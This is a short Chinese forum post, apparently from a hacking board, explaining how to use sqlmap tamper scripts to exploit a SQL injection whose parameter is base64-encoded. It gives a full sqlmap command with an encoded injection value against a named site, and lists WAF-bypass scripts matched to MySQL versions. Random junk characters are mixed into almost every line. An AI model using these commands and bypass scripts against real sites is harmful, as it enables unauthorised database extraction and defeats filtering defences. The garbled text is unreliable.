WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?! ]( x' `% V8 a [
* b. k* {5 Q6 \# h2 zsqlmap的tamper里有个base64encode.py8 ~* {4 o. \# I% m% e6 d
. M: y' N o$ S. W" n* r0 M使用如下4 H* s: ~! l* _* D1 V% S
! |6 D5 `0 p* {0 t0 S# R% |, n
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
( C+ f3 V/ w, |8 N( [' R1 I) b, t& [+ U8 a5 g
" B, s' e: i: |$ }/ ]sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”( u+ j/ C4 }! W+ H: A0 d$ n) S2 G. F
5 c" V, N0 _, ^; ]. O) ^其中常用到的bypass脚本绕过SQLMAP主要两个脚本:& u' E9 f8 L. g; Q
3 \. w$ B ~6 V' d
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
, n' J2 M6 X' K! [0 w" T6 x: ~! bspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
5 a$ H6 S4 q. Z7 v) Y: F. t首先确定目标数据库版本,然后选择相应的脚本。+ n( Q) K8 q# L
-v 3 --batch --tamper "space2hash.py"
# B# }) a% T" k6 `" ?
" j* r, M# [% r, y还有其他一些插件:2 w, d" K. w! h% G3 b9 ~1 C
encodes编码 ——charencode.py
; ^1 i0 w$ ^& B( M2 D) u: rbase64编码 —— base64encode.py
% y6 t; b5 {" O5 i4 [: v/ h替换空格和关键字 —— halfversionedmorekeywords.py) b. d! b- X# I
| t' u) A. D- Z; x3 X5 O" @3 N
' [3 s1 @: Z0 F8 j2 Y; F* G
# |' b0 b' N5 T' r0 N9 ^, y, L& }1 q0 B" l+ _+ t H2 T$ L
|